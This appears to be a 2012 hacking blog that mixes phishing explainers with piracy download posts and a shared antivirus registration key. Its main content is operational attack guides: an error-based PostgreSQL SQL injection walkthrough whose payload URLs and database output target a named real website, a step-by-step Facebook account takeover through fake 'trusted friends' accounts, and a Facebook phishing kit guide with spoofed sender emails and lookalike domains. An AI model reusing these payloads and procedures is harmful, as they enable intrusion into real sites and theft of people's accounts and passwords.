Tuesday, October 23, 2012

What Is Phishing?


What Is Phishing?


Phishing is an attempt to criminally and fraudulently acquire sensitive information, such as usernames, passwords and credit card details, by appearing as a trustworthy entity in an electronic communication. eBay, PayPal and other online banks are common targets.

Phishing is typically carried out by email or instant messaging and often directs users to enter details at a website, although phone contact has also been used.

Phishing is an example of social engineering techniques used to fool users. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical measures.

Recent phishing attempts have targeted the customers of banks and online payment services. Social networking sites such as Orkut are also a target of phishing.

Spoofed/Fraudulent e-mails are the most widely used tools to carry out the phishing attack. In most cases we get a fake e-mail that appears to have come from a Trusted Website . Here the hacker may request us to verify username & password by replaying to a given email address.


TECHNIQUES BEHIND PHISHING ATTACK


1. Link Manipulation

Most methods of phishing use some form of technical deception designed to make a link in an email appear to belong to some trusted organization or spoofed organization. Misspelled URLs or the use of subdomains are common tricks used by phishers, such as this example URL




instead of www.microsoft.com


2. Filter Evasion

Phishers have used images instead of text to make it harder for anti-phishing filters to detect text commonly used in phishing emails. This is the reason Gmail or Yahoo will disable the images by default for incoming mails.


How does a phishing attack/scam look like?

As scam artists become more sophisticated, so do their phishing e-mail messages and pop-up windows. They often include official-looking logos from real organizations and other identifying information taken directly from legitimate Web sites. Here is an example of how the phishing scam email looks like


Example of a phishing e-mail message, including a deceptive URL address linking to a scam Web site.

To make these phishing e-mail messages look even more legitimate, the scam artists may place a link in them that appears to go to the legitimate Web site (1), but it actually takes you to a phishing site (2) or possibly a pop-up window that looks exactly like the official site.

These copycat sites are also called “spoofed” Web sites. Once you’re at one of these spoofed sites, you may send personal information to the hackers.


How to identify a fraudulent e-mail?

Here are a few phrases to look for if you think an e-mail message is a phishing scam.

“Verify your account.”

Legitimate sites will never ask you to send passwords, login names, Social Security numbers, or any other personal information through e-mail.

“If you don’t respond within 48 hours, your account will be closed.”

These messages convey a sense of urgency so that you’ll respond immediately without thinking.

“Dear Valued Customer.”

Phishing e-mail messages are usually sent out in bulk andoften do not contain your first or last name.

“Click the link below to gain access to your account.”

HTML-formatted messages can contain links or forms that you can fill out just as you’d fill out a form on a Web site. The links that you are urged to click may contain all or part of a real company’s name and are usually “masked,” meaning that the link you see does not take you to that address but somewhere different, usually a scam Web site.

Notice in the following example that resting the mouse pointer on the link reveals the real Web address, as shown in the box with the yellow background. The string of cryptic numbers looks nothing like the company’s Web address, which is a suspicious sign.


So the Bottom line to defend from phishing attack is

1. Never assume that an email is valid based on the sender’s email address.

2. A trusted bank/organization such as paypal will never ask you for your full name and password in a PayPal email.

3. An email from trusted organization will never contain attachments or software.

4. Clicking on a link in an email is the most insecure way to get to your account.

Enjoy...

Hack Facebook Accounts By Adding Friends : Protect Yourself


Hack Facebook Accounts By Adding Friends : Protect Yourself


"Hack Facebook Accounts" by just adding new unknown friends is the new and Easy Way To Hack Facebook Accounts. Facebook recently added a new way to Recover your facebook account with the help of your three trusted FB Friends. But as always this new feature also became a cause for Hack FB Accounts.


What is Facebook's New Way To Recover Account ?

If you lost your Facebook.com password and the only option available is to recover your Facebook Account by entering the Security Answer for the question. But you even forgot your Security Answer. Previously in this condition you can't get your FB account back. But Facebook came out with new feature known as "Three Trused Friends"


When you lost your Facebook Account Password and even Security Answer, Facebook.com will ask you to select three trusted friends. And then FB will send security code to three friends each. And you have to ask your friends about that code and by entering those code you will be able to Recover Facebook Account and reset the password. But this feature is misused to Hack Facebook Accounts

Hack Facebook Accounts by adding Friends ! Is it possible ?? Yes

Here Hacker will create three fake FB accounts and will send a friend request to the victim from each account. If victim accepts those fake accounts and add them as a friends. Then Hacker will misuse the Facebook's Trusted Friend feature. Hacker will Easily Hack Facebook Accounts with the help of those Fake Facebook Accounts. The idea is simple to Hack Facebook Account Password Online.

HOW TO SECURE FACEBOOK ACCOUNT FROM HACKERS ??

1. Unfriend Unknown Friends & never accept Friend request from unknown Persons.
2. Use 2 Step Facebook Login Approvals Verification
3. Enable Sending Unknown Facebook Activity Information to Mobile
4. Always open Facebook from the official address Facebook.com
5. If possible use Secure Facebook Login
6. Never give access to unknown FB Application
7. Always install nay good Anti-Virus and Anti-Spywares.
8. Keep strong Password and always use secret Security questions.
9. By using this tips you can save yourself from Hacking of Facebook Accounts

So Friends, I hope you learned about this new and easy method on How Hackers Hack Facebook Accounts. And if you have any problem while Hacking Facebook Account Password Online .

Then please do comment. This is new method to Hack Facebook Accounts

Thursday, October 18, 2012

DownLoad Spotmau BOotSuite 2012 v 7.0


Download Spotmau BootSuite 2012 v 7.0




When your computer crashes, can not enter Windows, or you want to work in a startup environment, this is your NO. First choice. Just put it in your CD / DVD drive or plugin USB drive and restart your computer!With more than 40 functions utilities + on disk BootSuite, you can:Restart any computer (CD / USB)Rescue crashed Windows and hard driveRescue data from crashed computerFormat partitions, clone, wipe your hard driveInstall Windows easilyReset Windows password user / adminWhat you will get in BootSuite 2012?1 Boot CD. The computer can not boot? Do not worry about it again!This is the most powerful boot utility disk. When your computer crashes, can not enter Windows, or you want to work in a startup environment, this is your NO. First choice. Buy and download BootSuite, create a bootable CD or USB in 3 simple steps according to the instructions (the easiest way to create a bootable CD / USB), then just put the CD into your CD-ROM drive / DVD or plugin to create bootable USB to USB drive and restart your computer!Rescue Crashed Computer or Hard Drive. Never worry about CRASH and "blue screen" any more!In 10 years, we have served over 50,000 customers worldwide on Windows recovery! We are experts recover Windows first!Rescue corrupted data from your computer or hard drive. Do not panic any more! Get BootSuite and rescue your valuable data and hard drive!If your computer hard drive or severely damaged and can not be recovered, BootSuite can transfer your precious personal files on the external USB drive.Provides DOS command environmentProvides the MS-DOS command environment.Include all major DOS commands: chkdsk, debug, fdisk, diskcopy, Scandisk, etc.Recover your Windows CD KeyIf you decide to reinstall Windows, you need a product key to Windows, 1-Click to retrieve the Windows product key from your computer crashed or good.Partition and format hard drive cleaningWhen you plan to reinstall Windows, upgrade current hard drive, or install a new hard drive, this partition tool is your right choice.Working together with Clone tool included in this software, it will make your hard drive upgrade project a piece cake.Backup and restore files and systemWhen you are doing important computer recovery, upgrade projects, make a false move can cause sequential problems and waste your time. With a convenient backup and recovery tool, you can back up your system or partition and return to any of your activities by restoring from backup in one mouse click.Clone hard drive or partition"Clone" means that you can copy everything including Windows, programs, files, and settings from your old hard drive to a new one! Now you do not have to reinstall Windows and programs your hard in new drive.No need to spend $ 49.95 for the software can only make copies. Clone and other tools + 40 are included in this tool!Wipe entire hard drive or partitionWhen you want to reinstall Windows, deep wiping can give you a fresh start.When your computer is affected with boot sector virus, deep wiping can kill the virus.When you want to clean an old hard drive, deep wiping can speed up hard drive.When you want to donate your computer, deep wiping can prevent your data and files recovery data recovery software. (We highly recommend you wiping your hard drive before you donate!)


Click here to download

Wednesday, October 17, 2012

Avast! Free ANTivirus 7.0.1466 with registration key


Avast! Free Antivirus 7.0.1466 with registration key                                          


avastFree Antivirus represents the best free antivirus protection currently available on the market. This editionis FREE for non-commercial use and home. Its features include:

      Anti-spyware built
      web Shield
      Anti-rootkit built
      Automatic updates
      Strong self-protection
      virus Chest
      antivirus kernel
      System integration
      Simple user interface
      Integrated Virus Cleaner
      Resident protection
      Support for 64-bit Windows
      P2P and IM Shields
      internationalization
      Red Shield


                                      resistration key : W1208070R9900D1199-T549MYK0

                                                          file size : 89.32MB

                                                    Click here to download

online earning


Kya Ap Online Earn karna Chahte.?

GooGle paish karta H EarninG,
jO Apko raaton rat Ameer Bana Dey
:))

GooGle ki 1 Product H
jiska name ""Adsense"" H
Duniya ki mukhtalif Companies Like Brands, Pepsi etc. GooGle valon ko paisy dayti Hayn ke Hmari Advertise karo,
Taa'ke Hmari Publicity Ho, & Hmari cheezain sale Hon, voh Ad GooGle vale unko dayte Hayn jinki Wesite/BloG ho, Hm ye Ads apni Site par laGa dayte Hayn, jaB loG Hamari site par Atey Hayn Or un Ads ko daykhte Hayn, Or Click karty Hayn, jis se Hamein paisay milenGey.
Dhyaan rahe,, aGar pC se un Ads par Ckick kia to adsense Disable Bhi Ho skta H
aGar Ap Adsense layna chahte Hayn to pehly achi si Site/BloG Create karen,   1 sey 2 month tak Daily posting karty jayen
phher Adsense Account ke liye Apply karen
Goto
Google.com/adsense
ye forum Fill karen 24 se 72 hourx mein Apko Reply mil jaeGa
aGar apki site google ke Hisaab se achi H & visitors Aarahay Hn to apko adsense zaroor mileGa, Otherwise improve karna pareGa.
Adsense milne ke bad apni site par laGaen Or Kamaen
Have FunNn ;))

Hacking Password Protected Website's Safety Precuation Site Hacking

Hacking Password Protected Website's
Safety Precuation Site Hacking



dont try it on my website or you will be dead man.

warning : For educational purpose only

here are many ways to defeat java-script protected websites. Some are very simplistic, such as hitting

[ctl-alt-del ]when the password box is displayed, to simply turning offjava capability, which will dump you into the default page.You can try manually searching for other directories, by typing the directory name into the url address box of your browser, ie: you want access to www.target.com .

Try typing www.target.com/images .(almost ever y web site has an images directory) This will put you into the images directory,and give you a text list of all the images located there. Often, the title of an image will give you a clue to the name of another directory. ie: in www.target.com/images, there is a .gif named gamestitle.gif . There is a good chance then, that there is a 'games' directory on the site,so you would then type in www.target.com/games, and if it isa valid directory, you again get a text listing of all the files available there.


For a more automated approach, use a program like WEB SNAKE from anawave, or Web Wacker. These programs will create a mirror image of an entire web site, showing all director ies,or even mirror a complete server. They are indispensable for locating hidden files and directories.What do you do if you can't get past an opening "PasswordRequired" box? . First do an WHOIS Lookup for the site. In our example, www.target.com . We find it's hosted by www.host.com at 100.100.100. 1.



We then go to 100.100.100.1, and then launch \Web Snake, and mirror the entire server. Set Web Snake to NOT download anything over about 20K. (not many HTML pages are bigger than this) This speeds things up some, and keeps you from getting a lot of files and images you don't care about. This can take a long time, so consider running it right before bed time. Once you have an image of the entire server, you look through the directories listed, and find /target. When we open that directory, we find its contents, and all of its sub-directories listed. Let's say we find /target/games/zip/zipindex.html . This would be the index page that would be displayed had you gone through the password procedure, and allowed it to redirect you here.By simply typing in the url www.target.com/games/zip/zipindex.html you will be onthe index page and ready to follow the links for downloading
Email ThisBlogThis!Share to TwitterShare to Facebook

Monday, October 15, 2012

ultimate hacking Exposed EBook free download


0 COMMENTS
Hacking Exposed: Web Applications, 3rd Edition




Hacking Exposed: Web Applications, 3rd Edition By Joel Scambray, Vincent Liu, Caleb Sima MG-H, 3rd Edition 2011 | 482 Pages | ISBN: 0071740643 | PDF | 7 MB

The latest Web app attacks and countermeasures from world-renowned practitioners Protect your Web applications from malicious attacks by mastering the weapons and thought processes of today's hacker. Written by recognized security practitioners and thought leaders, Hacking Exposed Web Applications, Third Edition is fully updated to cover new infiltration methods and countermeasures. Find out how to reinforce authentication and authorization, plug holes in Firefox and IE, reinforce against injection attacks, and secure Web 2.0 features. Integrating security into the Web development lifecycle (SDL) and into the broader enterprise information security program is also covered in this comprehensive resource.

* Get full details on the hacker's footprinting, scanning, and profiling tools, including SHODAN, Maltego, and OWASP DirBuster * See new exploits of popular platforms like Sun Java System Web Server and Oracle WebLogic in operation * Understand how attackers defeat commonly used Web authentication technologies * See how real-world session attacks leak sensitive data and how to fortify your applications * Learn the most devastating methods used in today's hacks, including SQL injection, XSS, XSRF, phishing, and XML injection techniques * Find and fix vulnerabilities in ASP.NET, PHP, and J2EE execution environments * Safety deploy XML, social networking, cloud computing, and Web 2.0 services * Defend against RIA, Ajax, UGC, and browser-based, client-side exploits * Implement scalable threat modeling, code review, application scanning, fuzzing, and security testing procedures 

------------------------------------------------------------------------------------------------------------------------------------
Hacking Exposed: Network Security Secrets And Solutions

Hacking Exposed: Network Security Secrets and Solutions
Publisher: McGraw-Hill Osborne Media | ISBN: 0071613749 | edition 2009 | PDF | 720 pages | 14,8 mb


Meet the formidable demands of security in today's hyperconnected world with expert guidance from the world-renowned Hacking Exposed team. Following the time-tested "attack-countermeasure" philosophy, this 10th anniversary edition has been fully overhauled to cover the latest insidious weapons in the hacker's extensive arsenal. New and updated material:
- New chapter on hacking hardware, including lock bumping, access card cloning, RFID hacks, USB U3 exploits, and Bluetooth device hijacking
- Updated Windows attacks and countermeasures, including new Vista and Server 2008 vulnerabilities and Metasploit exploits
- The latest UNIX Trojan and rootkit techniques and dangling pointer and input validation exploits...


-------------------------------------------------------------------------------------------------------------------------------

HACKING EXPOSED MALWARE AND ROOTKITS

SIZE 4.9 Mb
Number Of Pages: 400
Publication Date: 2010
ISBN-10 / ASIN: 0071591184
ISBN-13 / EAN: 9780071591188
Publisher:McGraw-Hill Osborne Media 



"A harrowing guide to where the bad guys hide, and how you can find them." --Dan Kaminsky, Director of Penetration Testing, IOActive

"An amazing resource. It is timely, focused, and what we need to better understand and defend against one of the greatest cyber threats we face." --From the Foreword by Lance Spitzner, President of the Honeynet Project

Don't let another machine become a zombie in the malware army

Defend against the ongoing wave of malware and rootkit assaults the failsafe Hacking Exposed way. Real-world case studies and examples reveal how today's hackers use readily available tools to infiltrate and hijack systems. Step-by-step countermeasures provide proven prevention techniques. Find out how to detect and eliminate malicious embedded code, block pop-ups and websites, prevent keylogging, and terminate rootkits. The latest intrusion detection, firewall, honeynet, antivirus, anti-rootkit, and anti-spyware technologies are covered in detail.

• Understand how malware infects, survives, and propagates across an enterprise
• Learn how hackers use archivers, encryptors, and packers to obfuscate code
• Implement effective intrusion detection and prevention procedures
• Defend against keylogging, redirect, click fraud, and identity theft threats
• Detect, kill, and remove virtual, user-mode, and kernel-mode rootkits
• Prevent malicious website, phishing, client-side, and embedded-code exploits
• Protect hosts using the latest antivirus, pop-up blocker, and firewall software
• Identify and terminate malicious processes using HIPS and NIPS 


-------------------------------------------------------------------------------------------------------------------------------------

Hacking Exposed Web 2.0 : Security Secrets and Solutions

This book concisely identifies the types of attacks which are faced daily by Web 2.0 sites, and the authors give solid, practical advice on how to identify and mitigate these threats." --Max Kelly, CISSP, CIPP, CFCE, Senior Director of Security, Facebook

• Plug security holes in Web 2.0 implementations the proven Hacking Exposed way
• Learn how hackers target and abuse vulnerable Web 2.0 applications, browsers, plug-ins, online databases, user inputs, and HTML forms
• Prevent Web 2.0-based SQL, XPath, XQuery, LDAP, and command injection attacks
• Circumvent XXE, directory traversal, and buffer overflow exploits
• Learn XSS and Cross-Site Request Forgery methods attackers use to bypass browser security controls
• Fix vulnerabilities in Outlook Express and Acrobat Reader add-ons
• Use input validators and XML classes to reinforce ASP and .NET security
• Eliminate unintentional exposures in ASP.NET AJAX (Atlas), Direct Web Remoting, Sajax, and GWT Web applications
• Mitigate ActiveX security exposures using SiteLock, code signing, and secure controls
• Find and fix Adobe Flash vulnerabilities and DNS rebinding attacks

Sunday, October 14, 2012

SQL Manual very Easy MEthod


SQL Manual Very Easy Method *







 



Traditional relational database management systems (DBMSs) support a data model consisting of a collection of named relations, containing attributes of a specific type. In current commercial systems, possible types include floating point numbers, integers, character strings,
money, and dates.


Lets start to play with Postgre:
we have a sql error based vulnerable website:1st Step find the vulnerability:
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80'

ERROR: syntax error at or near “””
its mean this website can be injected.remember errors can varies you wont get the same error every time.2nd Step Columns count:
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 order by 1--

get valid page
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 order by 2--

Error Executing Database Query.
ERROR: ORDER BY position 2 is not in select list
That Error shows that there is one column.Lets try UNION SELECT query:
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=2 UNION SELECT 1--

Error Executing Database Query.
ERROR: UNION types character varying and integer cannot be matched Seems like UNION SELECT query is not working !!!
Lets try Errorbased Postgre SQLi…
3rd Step:
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast(version() as int)--

ERROR: invalid input syntax for integer: “PostgreSQL 8.4.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit” As we can see we got version of postgre DB server in the form of error.Lets move on and find database name.
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 0) as int)--

Error Executing Database Query. ERROR: invalid input syntax for integer: “scoutsqld”
Scoutsqld is 1st database name you can variey offset to get other databases names.
scoutsqld is first database we can get others by changing offset :)
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 1) as int)--

Error Executing Database Query.
ERROR: invalid input syntax for integer: “template0″
template0 is 2nd database so you can increase offset till you got error.Lets find out the user:
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select user from pg_database limit 1 offset 0) as int)--

Error Executing Database Query. ERROR: invalid input syntax for integer: “postgres”
postgres is the user :) Lets find the tables :>
4th step:
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select table_name from information_schema.tables  limit 1 offset 0) as int)--

Error Executing Database Query. ERROR: invalid input syntax for integer: “pg_type”
pg_type is first table we can get others by changing offset :) 5th step:
Now we have to find the columns from our specific table !!!
e.g
our table is action
for that we have to use oracle char conversion.Pg_type= CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101)
so our query is :
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select column_name from information_schema.columns where table_name= CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101)  limit 1 offset 0) as int)--

Error Executing Database Query.
ERROR: invalid input syntax for integer: ” typname “
And further you can find the columns using offset..Last step:
Now we have to extract data from our column .
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select typname from pg_type limit 1 offset 0) as int)--

Error Executing Database Query.
ERROR: invalid input syntax for integer: “bool”

hack facebook account

Hence we know that there are many techniques for Hack Facebook Account like Phishing Attacks, Keylogging and other Social techniques but today we are going to see how to hack passwords using new feature introduced by Facebook the 3 Trusted Friends Password Recovery Feature in this what happens if you have lost your password and you don’t have any access to your default email address than this feature will handy by sending request to your 3 trusted friends and hence gaining your account password again.
For this technique you need to create 3 fake Facebook account and you need to surely add these as friends into your victims account whose account you are going to hack.

After success full addition of your fake accounts into victims account as friends follow the below steps .:

1. Go to Facebook and click Forgot your Password ?



2. Than you will get something like below just enter the details you know about him enter his Username, email address and full name.



3. After entering everything check it again and click on search.


4. After succeful search for the user Facebook will show some information about how many emails are linked to the account and there is simple option saying 
No Longer Access to These click that one.


5. Now it will promote you to enter a new email address on which you will get the password resetting option so enter your email address I suggest you creating a Fake or Temporary email address for safety purpose.


6. Than it will promote you to enter the Security well if you have some security guess about that one than that’s ok but if you don’t know it than simply enter 3 wrong answers and it will take you to the 3 trusted friends recovery page like below.


7. Now just click continue and facebook will ask you to choose 3 trusted friends choose the 3 fake profiles of your which you created and added into the victims account. 
8. After selecting 3 accounts facebook will send security codes to these accounts just enter these codes and you will get Password Resetting email from Facebook on the account you created in Step 5

That’s it now you are successful in Hacking Facebook Password with the 3 Trusted Friends Method.

Note: This trick only works if 3 trusted friends agree to give you the security code so its really important that you add your 3 fake accounts into your victims facebook account as a friend.

how to hack facebook passwords or accounts ?


How to Hack Facebook Passwords or Accounts ?
 
1. First of all download the Facebook Phisher.
 2. Extract the rar file now you will get three files as given below:
 
  •       index.html
  •       passes.txt
  •       write.php
3. Upload all the Three files to any of the free Web hosting server. Remember while creating the  account on these servers try the username as nearer as possible to the original URL like faccbook or facobook etc.. As its the most crucial step. Some Free Web hosting servers are given below you can also find few more for yourself.
 
 
4. Once you have uploaded all the three files to web hosting server now you have to send these to your victim. This is the most important step regarding smart phishing technique.
Below are some sample mails that will help you to understand how to TRAP victim effectively.
 
 
Sample Is shown Below:  This the sample email that comes to your email account from facebook.
 
       
Now You have to edit this mail. Open this email and click on forward  now you will see this email in editable mode now remove the forwarded headers etc and forward from Header.
Remember your Name in Gmail must be Facebook and email account should be like 
noreplyfacebook@gmail.com etc… Now you have to put the Fake link of index.html file that u have got after uploading on the Web hosting server in place of Two exploit points. Remember always put link in href and original text should be as such. And also try to keep the link as much as closer to facebook original link.
 
Similarly you can use JOIN This Group on Facebook sample mail and Watch this video on Facebook in the similar fashion i have told you.
5. Now After sending phisher to victim, once the user logs in to his Facebook account using your Phisher, his user ID and password are ours..And these are stored in passes.txt What you have to do is just refresh your Web hosting account files. 
 
 
 
6. The Log txt file will contain the passwords and look like this:
 
       
       
 
Thats all Now you have hacked the password of victim. I hope you all have Liked It.